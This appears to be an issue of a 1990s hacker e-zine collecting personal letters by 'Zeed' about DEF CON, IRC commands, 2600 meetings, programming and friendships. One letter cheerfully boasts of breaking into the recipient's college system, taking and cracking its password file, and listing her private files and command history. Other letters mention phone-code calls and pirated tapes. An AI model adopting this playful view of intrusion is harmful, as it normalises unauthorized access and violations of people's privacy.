I was explaining to her that my parents might be moving again, and that I
have no idea and that I can be certain that I will be able to do anything.
Well, in the middle of our little intimate conversation, Brian comes back to
the hotel room.
Brian and Ryan are telling me all these stories about seeing Elvis walking
down the street.
I could tell Melanie wanted them to leave..
Anyways, they left, but then Andy came knocking on the door a couple seconds
later.
I started talking to Andy and Melanie pretty much bolted for the door not
saying where she was going.
This at the time had me thinking that Melanie really disliked me or
something. (I later found out, that she left cause she was going to break
out in tears =\ )
(She thought I was rejecting her or something, it's so complicated though, I
can't explain it all here) (I am still somewhat confused by it all)
Well at this time though, I thought she wanted no part of me. So I went off
with Andy back to the convention.
There I met up with Brian and Ryan and we watched hacker jeopardy.
It was a blast, they were giving away all kinds of free stuff, and of
course.. beers =)
Ryan took me to the Luxor and showed me their giant Sega Arcade.
Then I met up with Brian, and Ryan went back to the room to sleep.
I met up with a friend that I know from the New York 2600 meetings, Sid (Sid
Vicious).
Well around this time Jake came up to me and asked me if I wanted to go with
him to this huge bachelorette party in the hotel somewhere. hehehe, I didn't
exactly give him a yes or no answer ;)
I said "Umm, let me find Brian"
By the time I found Brian, Jake was gone. Don't I just have all the luck? =)
Well Brian, Sid and I went around, checked out the hot tubs, hehe, Naughty
hackers were in the hot tubs.
So then we went to the food court and we got some food.
Then we played a few slot machines..
All this time we were trying to find something to do, or at least find Jake.
Well Sid split up from us, and Brian and I just went and had something to eat
and drink again.
We talked and majorly goofed around. I was so tired and hungry, I must have
looked like a zombie.
I was like wired, my sentences hardly made any sense, and Brian and I talked
like 15 minutes straight on some formula for Artificial intelligence on a
computer. We were wacked.
Well Brian and I went back to the hotel room, and we both agreed that we
would both take Melanie to the Airport.
We woke up, and Melanie was like all packed and ready to go.
So I got ready, and the 3 of us went to the Jeep and drove to the Airport.
Melanie hardly said a word.
Well we got to her gate and everything, I put her bag beside her.
I said: "Well, I hope you have had a fun time here Melanie, I know I did..."
She just said "Yeah, it was fine."
I didn't really know what to do, so I said goodbye and Brian and I left back
for the hotel.
(I found out later that she wasn't really mad at me, just upset that I didn't
do more with just her.)
(I really wish she conveyed her feelings better though, I mean.. I am shy,
but even I make suggestions, especially if this person is your best friend
(As melanie says I am to her))
(Melanie told me later that she cried on the plane trip back)
(I feel sooo bad :( , what could I do?, it was like the toughest situation I
had ever been in)
Well.
We wrapped up the day, I met Andy at the last minute and gave him his stuff
he left in my room.
I said goodbye to all my friends at Defcon...
And we headed back to Arizona.....

I am really sorry Mazzie if I really ruined this whole thing with talking to
you about Melanie. It's just been in my mind a lot, and well I guess a lot of
people probably wondered about Mel and I.
We were like the center of a bunch of stupid rumors.

I have many mixed feelings about Melanie right now. I think she went a little
too far, but I guess it is my fault for getting her so involved with me.
Melanie is my friend, and I had been talking to her a lot, trying to make her
feel better and be her friend up til a week ago. (Now there is a huge new
development with Melanie that doesn't involve me.)
I like her a lot as a friend, but I know now that she is not the girlfriend I
want.
I am really confused right now, and not sure where my life is leading.
I really don't want to burden you with my crazy life problems though.

I am just happy that I have somebody like you to talk to. You don't know how
much I appreciate having friends like you.

Well anyways.. enough of that stuff..
Here is some other info.
Do you have a www browser like Netscape? or something?
I have my WWW page set up, it's still in development though.
Check it out :)

Umm, I would love to put your picture on my web page, but I am not going to
do it without your permission. If you don't want to, I understand. I just
made a little section for my friends' pictures, soon that section will have
my new picture on it too.

Well, how is Mazzie the IRC queen coming around?
Know all the commands yet? hehe
Here are some commands you could use:
/join #devo (Join devo channel)
/mode #devo +o Zeed (if you have +o (operator powers) you can give them to
others)
/load textbox.irc (If you still have textbox.irc, it's a neat script, you can
go into multiple channels at once)
you could do:
/join #devo
/join #pain
/join #hack
And you would be in all three channels.. Though when you typed it would end
up in #hack, because that's the latest room you switched to.
To switch between rooms (When you have textbox loaded) just type
/join #devo or whatever. Now you would be talking to #devo. But you did not
leave those other channels.
To leave a channel do this
/leave #devo

If you see somebody's nick and you want to know a little more about them,
type:
/whois zeed or whatever nick.
(note their domain name, like Orange@nether.net)

You can execute unix commands from IRC.....
use the exec command
/exec <command>

since finger is a unix command, you could do this.


Finger shows you info about me and my system. Not all people have finger info
though.
If you want any info for when people finger you, edit a file in your unix
directory called .plan.
You could put whatever you want in it, that file is shown to people who
finger you.

if you want to see who is in a particular channel do this

/who #devo

Each channel can be programmed with different modes.
You might see something like this:
Zeed has changed the mode to #devo to +i

Well this means I made the channel invite only, meaning that I have to use
the /invite command to let them in.

here are some more modes:
+t This controls who can set the topic in the channel. if it is +t then only
   +o people can set it.
+s This makes your channel a secret channel.
+n This makes it so some people can't write messages to the entire channel.
+m This makes the channel mediated, where pretty much only people with +o
   can talk in the channel.
+l L sets a limit on the number of people who can be in a channel.

you set the mode by doing this for example.

/mode #devo +s

if you want to take a mode off, just do this:

/mode #devo -s

To change the topic in the channel you can do this:

/topic #devo Mazzie is the greatest.. (This makes the topic = Mazzie is the
greatest..) =P


ok, one problem with IRC though is that it has what we call "lag"
Sometimes it's less than a second. other times it's a lot longer.

When you use IRC you are hooked up to an irc server.

irc servers are what get lagged..

What you want to do is avoid the lagged servers and go on the fast ones.
If your server slows down while you are on it you want to change servers.

one way to see how big the lag is, is by "pinging" somebody

if you did:

/ping zeed

and it responded with: 3 seconds.
Then we are doing ok.
If you never get a ping response, or if it ends up to be like 200 seconds,
then you have trouble ;)
A ping is like an echo bouncing off something.

Anyways, to change servers you use the /server command

/server irc.escape.com would work. There is usually a little delay between
switching servers.

Here are some fast servers for irc.

irc.escape.com
sgi.texas.net
irc.texas.net
irc-2.mit.edu
irc.eskimo.com

Hmm, what else.....
oh, to send private messages to people on IRC.

you use the /msg command.

like I would do this

/msg mazzie Hey cutie!

Private messages look a little different than channel messages.
When you are using textbox, private messages will beep too.


Thank you for attending Jean's small course of IRC 101.

=)

wow, I have been writing this for like 3 hours.. hehehehehe
oh well.

Say "hi" to all your roomies for me :)
and I hope you saved me a piece of pizza, because I am going to meet you one
day >=)
hopefully at least =P

Well, I am going to get duplicates of this film from defcon, and i'll send
you all kinds of neato stuff :)

I hope college isn't going to be too hard for you =\ I know you will do well
though. You are very smart :)

See you soon, {{{{{{{{{{{{{{{{{{{{{ Tabitha }}}}}}}}}}}}}}}}}}}}}
Happy birthday!!!

Love,
Jean-Christophe (isn't french just spiffy?)
=)



PS: As you know I have changed my phone number some time ago, did I give you
the new one?


{{{{{{{{{{{ Mazzie }}}}}}}}}}}}}


Sorry if I rambled on, or made no sense whatsoever ;)
It's 8:00 am here, and I had been working on my web page all night, but I
just had to write you!


------------------------------------------------------------------------------

A Confession of Stupidity
by Zeed


I bet you didn't know I was much of a hacker? :)
I don't usually talk about hacking with you...

Well this morning I was bored, and so I decided to take a look at your
school's computer. I was just nosy ;)

Anyways, I broke in =P
I have the entire password file for your whole college...

Mind you though, the passwords are encrypted and so I had to run my different
programs on the password file to help me unencrypt it...

All I can say is "bravo" you must have picked a good password. ie. one that
isn't a word in any language. I couldn't crack yours, if I had I would have
just showed you it for amusement that's all ;)

I did crack lots of other, not so wise people's passwords.

Hmm, you don't believe me.. That I broke in? =P
Here is your home directory with all your files in it ;)
---
/u/s/tgreiner
% ls
mail textbox.irc
% ls -la
total 307
drwxr-xr-x 3 tgreiner 512 Aug 29 22:12 .
drwxr-xr-x2025 root 36352 Aug 30 09:03 ..
-rw-r--r-- 1 tgreiner 0 Aug 27 13:32 .addressbook
-rw-r--r-- 1 tgreiner 1257 Aug 27 13:32 .addressbook.lu
-rw-r--r-- 1 tgreiner 29 Aug 17 1993 .bash_login
-rw-r--r-- 1 tgreiner 25 Aug 17 1993 .bashrc
-rw-r--r-- 1 tgreiner 24 Aug 17 1993 .cshrc
-rw-r--r-- 1 tgreiner 320 Aug 29 22:13 .history
-rw------- 1 tgreiner 0 Aug 28 21:09 .ircmotd
-rw-r--r-- 1 tgreiner 24 Aug 17 1993 .login
-rw------- 1 tgreiner 22925 Aug 27 13:33 .pine-interrupted-mail
-rw-r--r-- 1 tgreiner 5433 Aug 29 22:12 .pinerc
-rwxr-xr-x 1 tgreiner 21 Aug 17 1993 .profile
drwx------ 2 tgreiner 512 Aug 26 21:11 mail
-rw-r--r-- 1 tgreiner 221435 Aug 26 21:05 textbox.irc
%
--------
Now, don't worry :)
I am a good boy, I won't do anything bad to this computer :)
It's the same deal with that college in Vancouver I might be going to, I
already broke into theirs too. I leech stuff off of it, but I have and never
will damage it. I am sort of their protector.

You have to admit that I am the everyday type of hacker you see in 'hack',
eh?
I am just being silly =)

But, I get a cookie for being a good hacker don't I? =)

Well I hope things are going good with you.. I hope school is fine :)
I sorted out the pictures I am going to send to you...
I am going to put some other stuff together, and send it off ;)

Love,
Jean


btw. 'ls' is the command in unix that shows you what files are in your
directory ;)
I noticed that the only commands you had typed were:
irc
exit
pine

Am I being too nosy? Sorry, hehe. I just had to show off my latest hack =)

-------------------------------------------------------------------------------
My Night With a Narq
by Zeed

Just thought I would say "hi" ;)

I went to another NYC 2600 meeting last night, it was a lot of fun :)

I swear I might only go out and do something fun once a month, but it's worth
it :)

Lets see..
First I hung out there and talked to my friends about the normal hacker
stuff, it's kind of neat. I can see some of the little lamers looking at me
in the background looking at me like if I was some sort of hacker god. Here I
am with like 6 people around me most of them are at least 10 years older than
me and we are all talking about the latest tricks and things. I had my defcon
t-shirt too, so I was elite ;)

Anyways, I was there talking and Evian walked by me and rescued me from that
crowd. She just walked by me and grabbed my shirt and I thought, hmm, who
would I rather talk to right now.... A bunch of middle age hackers or one of
my friends, so I left the crowd of hackers. I went with Evian and sat down, I
showed her all my pictures from defcon. Now she officially knows what My 2
friends from CA , Jason, Emily, Melanie and Andy Conov look like. It was fun
:) I didn't have too many cool pictures. The one thing that sucked though was
that Rage and Plot said that they were both going to show up. They never did
though, so Evian and I tried calling up Rage to see what was up. We were like
using all these codes and things to try to make calls, the damn payphones
kept eating her quarters. hehe, they are getting us back I guess.

Well Plot and Rage never did show up, oh well..

Oh, lets see, who else was there....
Do you know Cameo (Davi, mistressx, etc) she was there all the way down from
Mass. (6 hours away). She was nice to talk to, she was a lot prettier
than her friends would tell me. I didn't talk to her though a lot, between me
and you, she is sort of a hacker groupie I think. She just goes to whoever
seems most 'elite', that's how I met her originally. I was on aol a couple
weeks ago and KT, Next, and some others were like calling me the god of the
internet, etc... Oddly enough, I got an IM from her a couple minutes later,
and I ended up calling her. I am not saying that she isn't a very sweet
person, it's just I wasn't always so 'elite' or knowledgeable and people would
never want to talk to me and my friends. Now it's funny, it's like people
just want to 'know' me. I did talk to her a while, but she mostly talked
about hacking. I really would usually talk about other things than computers
with my friends, hehe, they are so boring ;)

Lets see, Evian is much more sincere of a person. We both sit there making
fun of the "elite" people walking around the meeting. She is neat =)

Hmm, I met another girl there, maybe not as old as Evian(like 28) but maybe a
little younger. I don't know why she wanted to start talking to me, maybe
it's my new hair cut ;) She was interesting though, she like sets up WWW
servers and environments, which I thought was cool because that's what I am
sort of trying to do. (Trying, because it requires $$$) I think I am
becoming more comfortable about meeting people and meeting women (I am very
shy), but I was kind of surprised she started talking to me. If I do move to
Vancouver in January (it's very likely) I am going to miss these people,
they are so nice, all of them.. I hate moving =`(

My friend that I like see every month (The OMNI magazine reporter) was there
again. He talked to me a little while, hmm, maybe he is writing a book on me
;) He like mostly talks to me.. hmm.

There was also a NY times reporter there with her photographer. My friend PMF
(He is originally from Britain) went off on hacking for like 30 minutes
talking to this reporter. Talking about the difference between hacking and
phreaking, he was having his day in the sun. He has got to be one of the most
knowledgeable people I know when it comes to hacking. I bet he is going to be
all over the NY times. Then the photographer was going crazy with taking
pictures..

This other guy I know "Dennis" (Elite entity, he is probably one of the most
notorious hackers here other than Phiber Optik) started really harassing the
photographer, he was telling me how pissed he was at her taking pictures. He
was also VERY drunk, I left right when she called a security guard on him. I
wonder what happened.

Anyways, PMF, DTMF and I all went to McDonald's (It's three stories high).
I talked with them about all sorts of things, PMF seems to know just about
everything :)
He could pull credit reports, change your phone number, find out all kinds of
goodies ;)
He got busted though for breaking into a System 75, so he is a lot more
cautious.

We went back to the meeting after McDonald's but everybody was gone..
So DTMF took his subway, and I went with PMF on the subway to 42nd street.
Now if you know about NY you know about 42nd, you can pretty much get
anything there. It has like a bunch of adult theaters and movie stores on it.
Anyways, we went there to go get some pirated movies. PMF knew 2 places there
that had movies like Mortal Kombat and Clueless already on tape. I bought
mortal kombat for $10 just to see what the quality would be like, it's more
of a novelty item for me. PMF got a couple movies. BTW, PMF is 24. Hmm, I
don't know if I should tell you this ;)
We did go into an adult movie place, he was like looking for a particular
movie.. I just followed him in. I was sort of amazed at how much of that
stuff they sell in there. They had 1000s of videos, umm, and a bunch of weird
other things, some I have yet to figure out ;)

We didn't stay long, and I don't even know if I was old enough to be in
there, but really didn't care. I was in NY just to have fun and to get out. I
think they were ready to card PMF, but they never really looked at me. Hmm,
must be all that facial hair ;)

Anyways, after 42nd st, we took a subway to our train.

We almost went on the wrong train!!
We were there sitting on the wrong train for like 30 minutes.
2 girls came on the train and asked us if this was the train to Morristown.
PMF says "No this goes to Suffern NY, but you can come with us" He is such a
joker :)
So they got off that train..

10 minutes later the 2 girls come back and say "Umm, This train is going to
Morristown, but you guys can come with US" (hehe, role reversal)

So we got off that train and jumped on the right train.

Soon we were off, PMF got off at the 3rd stop.
I stayed on till my stop which was a lot farther down.

I had lots of fun :)

hehe, my life is so meager isn't it? ;)

All I did was hang out, go to McDonald's and buy a pirated video. Well I
did meet some new people.. But, that's all it took for me to have fun ;)

Well, I am going to have these pictures duplicated soon. Would you like a
picture of me too? I have some of me at defcon, but they aren't terribly
good.

I hope everything is going well for you, and all that school work isn't
killing you.

Love,
Jean
------------------------------------------------------------------------------
Creating Your Own Startup Computer Company
by Zeed



I was bored out of my mind in math class....

So I started designing my company out ;)

I could bore you with all the technical stuff, I will spare you.

I started designing the logo, the corporate headquarters, everything ;)
I am going to do business in europe, taiwan and Japan.

The reception area to the company is going to be a big room, with arcade
games lined up on both sides, and a huge "Zeed Enterprises" logo painted
on the floor.

I have like everything planned out.
I even have a list of people I need to hire to work for me.
programmers, artists, musicians, etc :)

Zeed Enterprises,
Software development for the:
PSX, Saturn, SNES, Genesis, Win '95, Amiga 4000, UNIX.
Internet service provider and www server provider.
UNIX security analysis and auditing services.

That's like what my business card will say ;)

All of this pretty much hinges on if I get accepted to that school in
Vancouver, Canada.
If I don't, I am going to probably go more heavily into just Sega Saturn and
UNIX and Unix security.

Look out Acclaim, Sega and Nintendo =P

Here I come :)

ok, there was my grandiose delusion.
It's going to happen though >=) That or something better.

I have very high goals for myself, when I don't achieve them I get depressed.

I am imagining this all in Southern, CA , maybe Northern , CA.

Hmm, well today I am going to get some things done..

I have to finish two programs for this school in Vancouver (I am going to
brag to them =P)

One program is a small game, and the other is a 3-D demo I am working
on(right now it's just all in my head).
The little game is about 75% done.

The game is written in C, and I haven't decided if I am going to write the
demo in Intel assembly language or in C. Yuck!! floating point math and trig
in Assembly, ahhh!!
shhh, don't get mad at me, I am just getting corny, I know you could care
less about floating point math ;)

Well my 486 is running, so I am in the slow rebuilding process.
Oh the joys of PCs.

My next computer will be a Silicon Graphics workstation, hell with this
microsoft crap ;)

umm, I am talking about computers too much...

I think I will interrogate you >=)
What type of music do you like?
Did you ever have pink fuzzy bunny slippers when you were a kid?

some interrogation... So much for my lawyer career.

Guess what? My dad is in Saudi Arabia right now =P
Talk about long distance calling.

Sorry about not pestering you for the last couple days...
I couldn't use AOL or anything, not even Windows. So I was unable to bug you
with my ever so timely email. I'll make it up to you though, I promise.

Did you miss me while I was gone? I thought so.. :) hehehe

When I go away for extended periods of time everybody misses me. Then a
couple days later after I come back, they wish I'd leave again =)

You know, every time I think of your real name, I think of "bewitched".
Nooo, don't hit me, I know that I am probably like the 1 millionth person to
say that to you. I just had to say it ;)

Well, I must leave now...

I do believe I have work to do if I am to start a company in 2 years.
a bien tot.

Jean


John, John, the leprechaun, went to school with nothing on..........
(I hated that stupid saying, I heard it like every day in first grade)

------------------------------------------------------------------------------
Graphics Research
by Zeed

What's new?

Man, I have been programming all day long.

I woke up this morning and before I even opened my eyes, I was thinking about
this program I wrote. It had a major bug in it, so I was debugging it in my
head. I fixed the bug in my head, opened my eyes and grabbed a piece of paper
and wrote the entire sub-routine for this new function.

This function rotates a 40 by 80 pixel box and maps it into a 100 by 100 box.
So I had to develop an algorithm that would rotate the entire image
according to how many degrees I tell it to rotate. This involved some
trigonometry.

Here I will show off to you what I wrote this morning, right when I woke up
;)

----------------------
int rx,ry;
float cx,cy;
float sx,sy;
int sxx,syy;
unsigned char col;
float cc,ss; /* cosine and sine value so we dont have to calculate more than
                once */

/* buf (80x40 source), swap (100x100 destination) and angle are declared
   elsewhere in the program */
for(rx=0;rx<10000;rx++) swap[rx]=0; // clear out buffer

angle+= .1;
for(ry=0;ry<40;ry++){
    for(rx=0;rx<80;rx++){
        col= buf[ry*80+rx];
        if (col!=0) { /* don't rotate if pixel has no color */
            cy= 20 - ry;
            cx= rx - 40;
            cc= cos(angle);
            ss= sin(angle);
            sx= cx * cc - cy * ss;
            sy= cy * cc - cx * ss;
            sxx= sx + 50;
            syy= 100 - sy - 50;
            swap[syy*100+sxx]= col;
            //vmem[(((syy+16)<<8)+((syy+16)<<6))+sxx+17]= col; //to bypass plotbk
        }
    }
}
---------------------------------

yeah, I am sure you understood all of it ;)

This is C by the way

umm, btw. An admin at your college found out about me about an hour ago.
He just kicked me off and changed my password. oh well :)


where was I? oh yes, the algorithm..
Would you believe there is still a bug in it somewhere, ahhhhh, I hate
debugging.
I guess that means I should have just written bug free code.

A weird thing happened on AOL today, I met two girls right after another..
Both IMed me first and both just started talking to me.
I am becoming sort of a famous person, hmm, like you :) hehehe.

I think you have heard of both of them, what's weird though is that I did not
know either before today. Just heard of them.
Quagmire and Jill from TX.
Quagmire is nice.
Jill, well she is just a kid, and besides, I thought I remember hearing stuff
about her a while back ;)

It never hurts to meet new faces though, that's just my little story though. I
popped into 'hack' for a second and I get people IMing me. I usually ignore
all the guys, unless I know them.

Sheeesh, me and my online friends, I am just going to get myself into another
bad situation. I swear, I am building this like huge library of pics of my
friends, hehehe.

I guess I am not going to be seeing "hackers" this weekend. Evian called me
last night and said she was doing stuff with her family or something this
weekend. Oh well :)
Will you come with me to see it? hey, it's the thought that counts :)

I am going to play psychologist for a second. Tell me if I am wrong.
I get this feeling about you...
Like you like talking to people online and stuff, and being their friends
because it's online only. You don't have to worry about anything else, and
they are there whenever you need them. I am not saying that you don't have or
like friends in the flesh world. I am just thinking out loud. Do you like the
thought of ever meeting anybody you have met online in person? or does that
scare you somewhat, or maybe you think it will shatter your own little
make-believe world. I am just curious.
I was doing a lot of thinking on my part about myself. Please do not take
this the wrong way. I could have asked it to anybody. I am just like I said,
coming up with theories and pondering them ;) I am just wondering what your
opinion is.

My sympathies are with you... (all that homework)

Take care..


<---------------------------------------------------------------------------->


Thus concludes FEH #4. See you again in a month or two.
